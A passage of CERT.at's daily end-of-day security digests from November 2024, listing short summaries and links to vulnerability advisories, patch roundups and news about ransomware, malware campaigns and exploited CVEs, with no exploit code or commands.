Security updates have been issued by Debian (postgresql-13, postgresql-15, and webkit2gtk), Fedora (libsndfile, microcode_ctl, and trafficserver), Mageia (kanboard, kernel, kmod-xtables-addons, kmod-virtualbox, and bluez, kernel-linus, opendmarc, and radare2), Oracle (.NET 9.0, bubblewrap and flatpak, buildah, expat, firefox, grafana, grafana-pcp, kernel, krb5, libsoup, libvpx, NetworkManager-libreswan, openexr, pcp, python3.11, python3.11-urllib3, python3.12, python3.9, squid, thunderbird, tigervnc, and webkit2gtk3), Red Hat (.NET 9.0, binutils, expat, grafana-pcp, kernel, libsoup, NetworkManager-libreswan, openexr, python3.11, python3.12, python39:3.9, squid, tigervnc, and webkit2gtk3), SUSE (chromedriver, cobbler, govulncheck-vulndb, and icinga2), and Ubuntu (linux-lowlatency, linux-lowlatency-hwe-6.8, python2.7, and zbar).
---------------------------------------------
https://lwn.net/Articles/999102/
∗∗∗ ZDI-24-1605: Adobe InDesign JP2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1605/
∗∗∗ ZDI-24-1606: 7-Zip CopyCoder Infinite Loop Denial-of-Service Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1606/
∗∗∗ ZDI-24-1613: Intel Driver & Support Assistant Log Folder Link Following Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1613/
∗∗∗ SSA-354569 V1.0: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-354569.html
∗∗∗ NVIDIA affected by a Critical vulnerability CVE-2024-0138 ∗∗∗
---------------------------------------------
https://thecyberthrone.in/2024/11/22/nvidia-affected-by-a-critical-vulnerab…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 20-11-2024 18:00 − Thursday 21-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Fortinet VPN design flaw hides successful brute-force attacks ∗∗∗
---------------------------------------------
A design flaw in the Fortinet VPN servers' logging mechanism can be leveraged to conceal the successful verification of credentials during a brute-force attack without tipping off defenders of compromised logins.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fortinet-vpn-design-flaw-hid…
∗∗∗ Due to security vulnerability: D-Link urges disposal of older routers ∗∗∗
---------------------------------------------
Several D-Link routers, some of which reached EOL status only a few months ago, are vulnerable. There are no patches.
---------------------------------------------
https://www.golem.de/news/wegen-sicherheitsluecke-d-link-draengt-auf-entsor…
∗∗∗ Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation ∗∗∗
---------------------------------------------
Authored by: M. Mohanasundaram and Neil Tyagi. In today’s rapidly evolving cyber landscape, malware threats ..
---------------------------------------------
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lumma-stealer-on-the-r…
∗∗∗ Azure Key Vault Tradecraft with BARK ∗∗∗
---------------------------------------------
This post details the existing and new functions in BARK that support adversarial tradecraft research relevant to the Azure Key Vault service. The latter part of the post shows an example of how a red team operator may use these commands during the course of an assessment.
---------------------------------------------
https://posts.specterops.io/azure-key-vault-tradecraft-with-bark-24163abc8d…
∗∗∗ “Free Hugs” – What to be Wary of in Hugging Face – Part 2 ∗∗∗
---------------------------------------------
Enjoy Threat Modeling? Try Threats in Models! Previously… In part 1 of this 4-part blog, we discussed Hugging Face, the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, exploiting users who ..
---------------------------------------------
https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-par…
∗∗∗ New Report Reveals Hidden Risks: How Internet-Exposed Systems Threaten Critical Infrastructure ∗∗∗
---------------------------------------------
A new Censys report found 145,000 exposed ICSs and thousands of insecure human-machine interfaces (HMIs), providing attackers with an accessible path to disrupt critical operations. Real-world examples underscore the danger, with Iranian and Russian-backed hackers exploiting HMIs to manipulate water systems in Pennsylvania and Texas. GreyNoise research ..
---------------------------------------------
https://www.greynoise.io/blog/new-report-reveals-hidden-risks-how-internet-…
∗∗∗ Finding Bugs in Chrome with CodeQL ∗∗∗
---------------------------------------------
This blog post discusses how to use a static analysis tool called CodeQL to search for vulnerabilities in Chrome.
---------------------------------------------
https://bughunters.google.com/blog/5085111480877056/finding-bugs-in-chrome-…
∗∗∗ Spelunking in Comments and Documentation for Security Footguns ∗∗∗
---------------------------------------------
Join us as we explore seemingly safe but deceptively tricky ground in Elixir, Python, and the Golang standard library. We cover officially documented, or at least previously discussed, code functionality that could unexpectedly introduce vulnerabilities. Well-documented behavior is not always what it appears!
---------------------------------------------
https://blog.includesecurity.com/2024/11/spelunking-in-comments-and-documen…
∗∗∗ Azure Detection Engineering: Log idiosyncrasies you should know about ∗∗∗
---------------------------------------------
We share a few inconsistencies found in Azure logs which make detection engineering more challenging.
---------------------------------------------
https://tracebit.com/blog/azure-detection-engineering-log-idiosyncrasies-yo…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel, NetworkManager-libreswan, and openssl), Fedora (chromium and llvm-test-suite), Mageia (thunderbird), and Ubuntu (linux-aws-6.8, linux-azure, linux-azure-6.8, linux-oracle-6.8, linux-azure, and ruby2.7).
---------------------------------------------
https://lwn.net/Articles/998949/
∗∗∗ Progress Kemp LoadMaster OS Command Injection Vulnerability ∗∗∗
---------------------------------------------
FortiGuard network sensors detect attack attempts targeting the Progress Kemp LoadMaster. Successful exploitation of the CVE-2024-1212 vulnerability allows unauthenticated remote attackers to access the system through the management interface, potentially leading to data breaches, service disruptions, or further attacks.
---------------------------------------------
https://fortiguard.fortinet.com/outbreak-alert/kemp-loadmaster-os-command-i…
∗∗∗ ZDI-24-1532: 7-Zip Zstandard Decompression Integer Underflow Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1532/
∗∗∗ Drupal core - Moderately critical - Gadget chain - SA-CORE-2024-008 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-008
∗∗∗ Drupal core - Moderately critical - Gadget chain - SA-CORE-2024-007 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-007
∗∗∗ Drupal core - Critical - Cross Site Scripting - SA-CORE-2024-005 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-005
∗∗∗ Drupal core - Moderately critical - Access bypass - SA-CORE-2024-004 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-004
∗∗∗ Drupal core - Moderately critical - Cross Site Scripting - SA-CORE-2024-003 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-003
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 19-11-2024 18:00 − Wednesday 20-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Bigger and badder: how DDoS attack sizes have evolved over the last decade ∗∗∗
---------------------------------------------
If we plot the metrics associated with large DDoS attacks observed in the last 10 years, does it show a straight, steady increase in an exponential curve that keeps becoming steeper, or is it closer to a linear growth? Our analysis found the growth is not linear but rather is exponential, with the slope varying depending on the metric (rps, pps or bps).
---------------------------------------------
https://blog.cloudflare.com/bigger-and-badder-how-ddos-attack-sizes-have-ev…
∗∗∗ No attack on Idev portal: Destatis denies responsibility for data leak ∗∗∗
---------------------------------------------
The Federal Statistical Office has examined its Idev portal. The data captured by hackers is said to have leaked from the reporting companies themselves.
---------------------------------------------
https://www.golem.de/news/kein-cyberangriff-auf-meldesystem-destatis-weist-…
∗∗∗ Inside the Threat: A look behind the scenes of defending against an active threat ∗∗∗
---------------------------------------------
Early detection and proactive investigation can nip a ransomware attack in the bud. A recent real-world case shows how it works.
---------------------------------------------
https://sec-consult.com/de/blog/detail/inside-the-threat-ein-blick-hinter-d…
∗∗∗ Decades-Old Security Vulnerabilities Found in Ubuntu's Needrestart Package ∗∗∗
---------------------------------------------
Multiple decade-old security vulnerabilities have been disclosed in the needrestart package installed by default in Ubuntu Server (since version 21.04) that could allow a local attacker to gain root privileges without requiring user ..
---------------------------------------------
https://thehackernews.com/2024/11/decades-old-security-vulnerabilities.html
∗∗∗ Yubikey side channel: further products vulnerable to cloning attack ∗∗∗
---------------------------------------------
The side-channel vulnerability EUCLEAK also became known as the "Yubikey cloning attack". The BSI is re-certifying updated products that were affected.
---------------------------------------------
https://www.heise.de/news/EUCLEAK-Weitere-Produkte-fuer-Cloning-Attacke-anf…
∗∗∗ Threat Assessment: Ignoble Scorpius, Distributors of BlackSuit Ransomware ∗∗∗
---------------------------------------------
Explore this assessment on cybercrime group Ignoble Scorpius, distributors of BlackSuit ransomware. Since May 2023, operations have increased, affecting critical sectors.
---------------------------------------------
https://unit42.paloaltonetworks.com/threat-assessment-blacksuit-ransomware-…
∗∗∗ Looking at the Internals of the Kenwood DMX958XR IVI ∗∗∗
---------------------------------------------
For the upcoming Pwn2Own Automotive contest, a total of four in-vehicle infotainment (IVI) head units have been selected as targets. One of these is the double DIN Kenwood DMX958XR. This unit offers a variety of ..
---------------------------------------------
https://www.thezdi.com/blog/2024/11/18/looking-at-the-internals-of-the-kenw…
∗∗∗ Critical Vulnerabilities in vCenter Server Exploited in the Wild ∗∗∗
---------------------------------------------
CVE: CVE-2024-38813, CVE-2024-38812. Affected Products: VMware vCenter Server, VMware Cloud Foundation. Exploitation: Broadcom has confirmed exploitation of these vulnerabilities [1]. The CVE has not been ..
---------------------------------------------
https://www.truesec.com/hub/blog/critical-vulnerabilities-in-vcenter-server…
∗∗∗ Malicious QR Codes: How big of a problem is it, really? ∗∗∗
---------------------------------------------
QR codes are disproportionately effective at bypassing most anti-spam filters. Talos discovered two effective methods for defanging malicious QR codes, a necessary step to make them safe for consumption.
---------------------------------------------
https://blog.talosintelligence.com/malicious_qr_codes/
∗∗∗ Hackers Exploit Misconfigured Jupyter Servers for Illegal Sports Streaming ∗∗∗
---------------------------------------------
Aqua Nautilus’ research reveals hackers are leveraging vulnerable and misconfigured Jupyter Notebook servers to steal live sports streams.
---------------------------------------------
https://hackread.com/hackers-exploit-misconfigured-jupyter-servers-sports-s…
∗∗∗ Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 ∗∗∗
---------------------------------------------
It'll be no surprise that 2024, 2023, 2022, and every other year of humanity's existence has been tough for SSLVPN appliances. Anyhow, there are new vulnerabilities (well, two of them) that are being exploited in the Palo Alto Networks ..
---------------------------------------------
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve…
∗∗∗ Defending Your Directory: An Expert Guide to Mitigating Pass-the-Hash Attacks in Active Directory ∗∗∗
---------------------------------------------
In our latest technical blog series, our DFIR team are highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and giving experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
∗∗∗ Let’s Encrypt: Ten Years ∗∗∗
---------------------------------------------
Vital personal and business information flows over the Internet more frequently than ever, and we don’t always know when it’s happening. It’s clear at this point that encrypting is something all of us should be doing. Then why don’t we use TLS (the successor to SSL) everywhere? Every browser in every device supports it. Every server in every data center supports it. Why don’t we just flip the switch?
---------------------------------------------
https://letsencrypt.org/2014/11/18/announcing-lets-encrypt/
∗∗∗ Achieving NIST CSF 2.0 Compliance: Best Practices ∗∗∗
---------------------------------------------
Cybersecurity is an ever-growing concern in today’s digital era. With the rise of cyberattacks and data breaches, organizations must adopt best practices to safeguard their sensitive information. One of the leading frameworks guiding organizations in securing their digital assets is the NIST CSF 2.0 by National Institute of Standards and ..
---------------------------------------------
https://fortbridge.co.uk/regulations/achieving-nist-csf-2-0-compliance-with…
=====================
= Vulnerabilities =
=====================
∗∗∗ DSA-5815-1 needrestart - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00229.html
=====================
= End-of-Day report =
=====================
Timeframe: Monday 18-11-2024 18:00 − Tuesday 19-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Spotify abused to promote pirated software and game cheats ∗∗∗
---------------------------------------------
Spotify playlists and podcasts are being abused to push pirated software, game cheat codes, spam links, and "warez" sites. By injecting targeted keywords and links in playlist names and podcast descriptions, threat actors may ..
---------------------------------------------
https://www.bleepingcomputer.com/news/security/spotify-abused-to-promote-pi…
∗∗∗ New Helldown Ransomware Variant Expands Attacks to VMware and Linux Systems ∗∗∗
---------------------------------------------
Cybersecurity researchers have shed light on a Linux variant of a relatively new ransomware strain called Helldown, suggesting that the threat actors are broadening their attack focus."Helldown deploys Windows ransomware derived from the LockBit 3.0 code," Sekoia ..
---------------------------------------------
https://thehackernews.com/2024/11/new-helldown-ransomware-expands-attacks.h…
∗∗∗ Critical 9.8-rated VMware vCenter RCE bug exploited after patch fumble ∗∗∗
---------------------------------------------
If you didn't fix this a month ago, your to-do list probably needs a reshuffle. Two VMware vCenter server bugs, including a critical heap-overflow vulnerability that leads to remote code execution (RCE), have been exploited in attacks after Broadcom’s first attempt to fix the flaws fell short.
---------------------------------------------
https://www.theregister.com/2024/11/18/vmware_vcenter_rce_exploited/
∗∗∗ Veritas Enterprise Vault: critical code injection vulnerabilities in archiving software ∗∗∗
---------------------------------------------
In Veritas Enterprise Vault, attackers can abuse critical vulnerabilities to inject malicious code.
---------------------------------------------
https://www.heise.de/news/Veritas-Enterprise-Vault-Kritische-Codeschmuggel-…
∗∗∗ Critical Palo Alto vulnerability: details and patches are out, CISA warns of exploit ∗∗∗
---------------------------------------------
Almost three weeks after the first rumours of an exploit, the vendor has finally reacted, but is playing tricks. Meanwhile, the US cyber agency is warning of attacks.
---------------------------------------------
https://www.heise.de/news/Kritische-Palo-Alto-Luecke-Patches-sind-da-CISA-w…
∗∗∗ FreeBSD Foundation releases Bhyve and Capsicum security audit ∗∗∗
---------------------------------------------
The FreeBSD Foundation has announced the release of a security audit report conducted by security firm Synacktiv. The audit uncovered a number of vulnerabilities. Most of these vulnerabilities have been addressed through official FreeBSD Project security advisories, which offer detailed information about each vulnerability, its impact, and the measures ..
---------------------------------------------
https://lwn.net/Articles/998615/
∗∗∗ FrostyGoop’s Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications ∗∗∗
---------------------------------------------
We analyze FrostyGoop malware, which targets OT systems. This article walks through newly discovered samples, indicators, and also examines configurations and network communications.
---------------------------------------------
https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/
∗∗∗ The Importance of Establishing a Solid Third Party Risk Management Framework for Risk Mitigation ∗∗∗
---------------------------------------------
In the previous post, we introduced the concept of Third-Party Risk Management (TPRM) and its importance in today’s interconnected world. Now, let us have a look at the practical aspects of building a solid TPRM program and why it is important for your company. 1. Start with a Third-Party Inventory: The first step in building ..
---------------------------------------------
https://blog.nviso.eu/2024/11/19/the-importance-of-establishing-a-solid-thi…
∗∗∗ Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden ∗∗∗
---------------------------------------------
A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked ..
---------------------------------------------
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/
∗∗∗ Threat Actors Hijack Misconfigured Servers for Live Sports Streaming ∗∗∗
---------------------------------------------
To keep up with the ever-evolving world of cybersecurity, Aqua Nautilus researchers deploy honeypots that mimic real-world development environments. During a recent threat-hunting operation, they uncovered a surprising new ..
---------------------------------------------
https://blog.aquasec.com/threat-actors-hijack-misconfigured-servers-for-liv…
∗∗∗ Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 ∗∗∗
---------------------------------------------
Note: Since this is breaking news and more details are being released, we're updating this ..
---------------------------------------------
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve…
∗∗∗ NVD Backlog Tops 20,000 CVEs Awaiting Analysis as NIST Prepares System Updates ∗∗∗
---------------------------------------------
CVEs awaiting analysis by the NVD have broken the 20,000 mark, after the security community noticed its enrichment activity slowed to nearly a halt again last week. NIST failed to meet its self-imposed deadline of ..
---------------------------------------------
https://socket.dev/blog/nvd-backlog-tops-20-000-cves
∗∗∗ Threat Actor Exposes Playbook for Exploiting npm to Build Blockchain-Powered Botnets ∗∗∗
---------------------------------------------
In October 2024, Socket discovered a widespread npm malware campaign using Ethereum smart contracts to evade detection and maintain control over infected systems. Building on our initial research and equipped with analyses of the ..
---------------------------------------------
https://socket.dev/blog/exploiting-npm-to-build-a-blockchain-powered-botnet
∗∗∗ Extending Burp Suite for fun and profit – The Montoya way – Part 7 ∗∗∗
---------------------------------------------
Last time we saw how to develop an extension that will add custom active and passive checks to the Burp Scanner. Today we will modify that extension to detect serialization issues using ..
---------------------------------------------
https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-t…
∗∗∗ U.S. Extradites and Charges Alleged Phobos Ransomware Admin ∗∗∗
---------------------------------------------
The United States secured the extradition of a Russian national from South Korea who is allegedly the mastermind behind the notorious Phobos ransomware. Evgenii Ptitsyn, 42, is accused of administering the Phobos ..
---------------------------------------------
https://thecyberexpress.com/us-charges-alleged-phobos-ransomware-admin/
=====================
= Vulnerabilities =
=====================
∗∗∗ ZDI-24-1516: Trend Micro Deep Security Agent Manual Scan Command Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trend Micro Deep Security Agent. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-51503.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1516/
∗∗∗ ZDI-24-1517: McAfee Total Protection Uncontrolled Search Path Element Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows local attackers to escalate privileges on affected installations of McAfee Total Protection. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.7. The following CVEs are assigned: CVE-2024-49592.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1517/
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (.NET 9.0, bcc, bluez, bpftrace, bubblewrap, flatpak, buildah, cockpit, containernetworking-plugins, cups, cyrus-imapd, edk2, expat, firefox, fontforge, gnome-shell, gnome-shell-extensions, grafana, grafana-pcp, gtk3, httpd, iperf3, jose, krb5, libgcrypt, libsoup, libvirt, libvpx, lldpd, microcode_ctl, ..
---------------------------------------------
https://lwn.net/Articles/998755/
∗∗∗ Oracle Security Alert for CVE-2024-21287 - 18 November 2024 ∗∗∗
---------------------------------------------
https://www.oracle.com/security-alerts/alert-cve-2024-21287.html
=====================
= End-of-Day report =
=====================
Timeframe: Friday 15-11-2024 18:00 − Monday 18-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Honeypot: Researcher pranks script kiddies with fake ransomware ∗∗∗
---------------------------------------------
A tool called Jinn was supposed to simplify ransomware attacks. In fact, it was a honeypot that quite a few actors fell for.
---------------------------------------------
https://www.golem.de/news/honeypot-forscher-veralbert-scriptkiddies-mit-fak…
∗∗∗ Women In Russian-Speaking Cybercrime: Mythical Creatures or Significant Members of Underground? ∗∗∗
---------------------------------------------
A blog detailing in-depth research into women in Russian-speaking cybercrime.
---------------------------------------------
https://www.sans.org/blog/women-in-russian-speaking-cybercrime-mythical-cre…
∗∗∗ Mastering DORA core topics: a deep dive into incident management ∗∗∗
---------------------------------------------
In this blog post, we look at the requirements for DORA incident management.
---------------------------------------------
https://sec-consult.com/de/blog/detail/dora-kernthemen-meistern-ein-deep-di…
∗∗∗ Swiss cheesed off as postal service used to spread malware ∗∗∗
---------------------------------------------
QR codes arrive via an age-old delivery system. Switzerland's National Cyber Security Centre (NCSC) has issued an alert about malware being spread via the country's postal service.
---------------------------------------------
https://www.theregister.com/2024/11/16/swiss_malware_qr/
∗∗∗ WTF: Security researchers find three new vulnerabilities while reproducing one ∗∗∗
---------------------------------------------
When the Watchtowr Labs researchers wanted to verify the vulnerability in FortiManager, they found further bugs and incomplete fixes.
---------------------------------------------
https://www.heise.de/news/Sicherheitsforscher-finden-beim-Nachstellen-einer…
∗∗∗ T-Mobile affected by Chinese cyberattack ∗∗∗
---------------------------------------------
According to a report, the hackers were able to penetrate several telecommunications companies in the USA as well as internationally.
---------------------------------------------
https://www.derstandard.at/story/3000000245232/t-mobile-von-chinesischem-cy…
∗∗∗ Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 ∗∗∗
---------------------------------------------
We detail the observed limited activity regarding authentication bypass vulnerability CVE-2024-0012 affecting specific versions of PAN-OS software, and include protections and mitigations.
---------------------------------------------
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
∗∗∗ Acute wave of DDoS attacks against Austrian companies and organisations ∗∗∗
---------------------------------------------
Since early this morning, various Austrian companies and organisations from different industries and sectors have been confronted with DDoS attacks. The exact background of the attack is currently unknown to us, but there are indications of a hacktivist motivation. In view of the current events ..
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/11/ddos-angriffe-november-2024
∗∗∗ BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA ∗∗∗
---------------------------------------------
KEY TAKEAWAYS: Volexity discovered and reported a vulnerability in Fortinet's Windows VPN client, FortiClient, where user credentials remain in process memory after a user authenticates to the VPN. This vulnerability was abused by BrazenBamboo in their DEEPDATA malware. BrazenBamboo is the threat actor behind development of the ..
---------------------------------------------
https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlien…
∗∗∗ Inside Water Barghest’s Rapid Exploit-to-Market Strategy for IoT Devices ∗∗∗
---------------------------------------------
In this blog entry, we discuss Water Barghest's exploitation of IoT devices, transforming them into profitable assets through advanced automation and monetization techniques.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/k/water-barghest.html
∗∗∗ What To Use Instead of PGP ∗∗∗
---------------------------------------------
It’s been more than five years since The PGP Problem was published, and I still hear from people who believe that using PGP (whether GnuPG or another OpenPGP implementation) is a thing ..
---------------------------------------------
https://soatok.blog/2024/11/15/what-to-use-instead-of-pgp/
∗∗∗ TPM-Backed SSH Keys on Windows 11 ∗∗∗
---------------------------------------------
On my MacBook, I’ve been using TPM/security key-based SSH keys for years since it’s where I do the most development and the software support is good. Secretive is a decent app I can vouch for. Before that, I was ..
---------------------------------------------
https://cedwards.xyz/tpm-backed-ssh-keys-on-windows-11/
∗∗∗ Reverse Engineering iOS 18 Inactivity Reboot ∗∗∗
---------------------------------------------
iOS 18 introduced a new inactivity reboot security feature. What does it protect from and how does it work? This blog post covers all the details down to a kernel extension and the Secure Enclave Processor.
---------------------------------------------
https://naehrdine.blogspot.com/2024/11/reverse-engineering-ios-18-inactivit…
∗∗∗ Malicious npm Package Exploits WhatsApp Authentication with Remote Kill Switch for File Destruction ∗∗∗
---------------------------------------------
A malicious npm package disguised as a WhatsApp client is exploiting authentication flows with a remote kill switch to exfiltrate data and destroy files.
---------------------------------------------
https://socket.dev/blog/malicious-npm-package-exploits-whatsapp-authenticat…
∗∗∗ Redis CVE-2024-31449: How to Reproduce and Mitigate the Vulnerability ∗∗∗
---------------------------------------------
On October 7, 2024, information about a serious vulnerability in Redis, identified as CVE-2024-31449, was published. This vulnerability allows an authenticated user to execute remote code using specially ..
---------------------------------------------
https://redrays.io/blog/redis-cve-2024-31449-how-to-reproduce-and-mitigate-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (binutils, libsoup, squid:4, tigervnc, and webkit2gtk3), Debian (icinga2, postgresql-13, postgresql-15, smarty3, symfony, thunderbird, and waitress), Fedora (dotnet9.0, ghostscript, microcode_ctl, php-bartlett-PHP-CompatInfo, python-waitress, and webkitgtk), Gentoo (Perl, Pillow, and X.Org X server, XWayland), ..
---------------------------------------------
https://lwn.net/Articles/998570/
∗∗∗ CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) (Severity: CRITICAL) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-0012
∗∗∗ CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-9474
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 14-11-2024 18:00 − Freitag 15-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ These dumb passwords are the most commonly used ∗∗∗
---------------------------------------------
Are your accounts well protected? To be safe, take a look at this list; hopefully you won't feel caught out.
---------------------------------------------
https://futurezone.at/digital-life/dumme-passwoerter-oesterreich-internatio…
∗∗∗ Cyberattack on Destatis: hackers steal company data from the Federal Statistical Office ∗∗∗
---------------------------------------------
The 3.8 GB data set provides access to information reported by companies. The attacked system had only recently been modernised.
---------------------------------------------
https://www.golem.de/news/cyberangriff-auf-destatis-hacker-erbeuten-firmend…
∗∗∗ macOS 15.1: Apple patch breaks third-party firewalls ∗∗∗
---------------------------------------------
Anyone using third-party firewalls such as Little Snitch on macOS 15.1 may run into problems. Depending on the configuration, filter rules remain ineffective.
---------------------------------------------
https://www.golem.de/news/macos-15-1-apple-patcht-drittanbieter-firewalls-k…
∗∗∗ New Glove Stealer Malware Bypasses Google Chrome’s App-Bound to Steal Data ∗∗∗
---------------------------------------------
The New Glove Stealer malware has the ability to bypass Google Chrome’s Application-Bound (App-Bound) encryption to steal browser cookies. The threat actors’ attacks employed social engineering techniques akin to ..
---------------------------------------------
https://heimdalsecurity.com/blog/glove-stealer-malware/
∗∗∗ Against grandparent scams: AI granny to tie up criminals in endless conversations ∗∗∗
---------------------------------------------
An AI-generated granny is meant to keep criminals busy on behalf of O2, criminals who try to con real people out of their money over the phone. To do so, she is supposed to talk and talk.
---------------------------------------------
https://www.heise.de/news/Gegen-Enkeltrickbetrug-KI-Omi-soll-Kriminelle-in-…
∗∗∗ WordPress plug-in Really Simple Security puts 4 million websites at risk ∗∗∗
---------------------------------------------
Around four million WordPress sites use the Really Simple Security plug-in. Attackers from the internet can compromise them.
---------------------------------------------
https://www.heise.de/news/Wordpress-Plug-in-Really-Simple-Security-gefaehrd…
∗∗∗ An Interview With the Target & Home Depot Hacker ∗∗∗
---------------------------------------------
In December 2023, KrebsOnSecurity revealed the real-life identity of Rescator, the nickname used by a Russian cybercriminal who sold more than 100 million payment cards stolen from Target and Home Depot between 2013 and 2014. Moscow resident Mikhail Shefel, who confirmed using the Rescator identity in a recent interview, also admitted reaching out because he is broke and ..
---------------------------------------------
https://krebsonsecurity.com/2024/11/an-interview-with-the-target-home-depot…
∗∗∗ Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing Attack ∗∗∗
---------------------------------------------
North Korean IT worker cluster CL-STA-0237 instigated phishing attacks via video apps in Laos, exploiting U.S. IT firms and major tech identities.
---------------------------------------------
https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cl…
∗∗∗ Critical security vulnerability in the Laravel framework - updates available ∗∗∗
---------------------------------------------
A critical security vulnerability has been discovered in the Laravel framework. The flaw allows attackers to gain unauthorised access to applications and manipulate environment variables by means of manipulated URLs.
---------------------------------------------
https://www.cert.at/de/warnungen/2024/11/kritische-sicherheitslucke-in-lara…
∗∗∗ Safeguarding Healthcare Organizations from IoMT Risks ∗∗∗
---------------------------------------------
The healthcare industry has undergone significant transformation with the emergence of Internet of Medical Things (IoMT) devices. These devices, ranging from wearable monitors to network imaging systems, collect and process vast ..
---------------------------------------------
https://levelblue.com/blogs/security-essentials/safeguarding-healthcare-org…
∗∗∗ Zero-day exploitation targeting Palo Alto Networks firewall management interfaces ∗∗∗
---------------------------------------------
Palo Alto Networks has indicated they are observing threat activity exploiting a zero-day unauthenticated remote command execution vulnerability in their firewall management interfaces.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/11/15/etr-zero-day-exploitation-targe…
∗∗∗ Microsoft Power Pages Misconfigurations Expose Millions of Records Globally ∗∗∗
---------------------------------------------
SaaS Security firm AppOmni has identified misconfigurations in Microsoft Power Pages that can lead to severe data breaches.
---------------------------------------------
https://hackread.com/microsoft-power-pages-misconfigurations-data-leak/
∗∗∗ Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation ∗∗∗
---------------------------------------------
Written by: Matthijs Gielen, Jay Christiansen. Background: New solutions, old problems. Artificial intelligence (AI) and large language models (LLMs) are here to signal a new day in the cybersecurity world, but what does that mean for us, the attackers and defenders, and our battle to improve security through all the noise? Data is everywhere. For most ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-…
∗∗∗ Defending Your Directory: An Expert Guide to Fortifying Active Directory Against LDAP Injection Threats ∗∗∗
---------------------------------------------
In our latest technical blog series, our DFIR team highlights the most prominent Active Directory (AD) threats, describes the tell-tale signs that your AD might be at risk, and gives experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
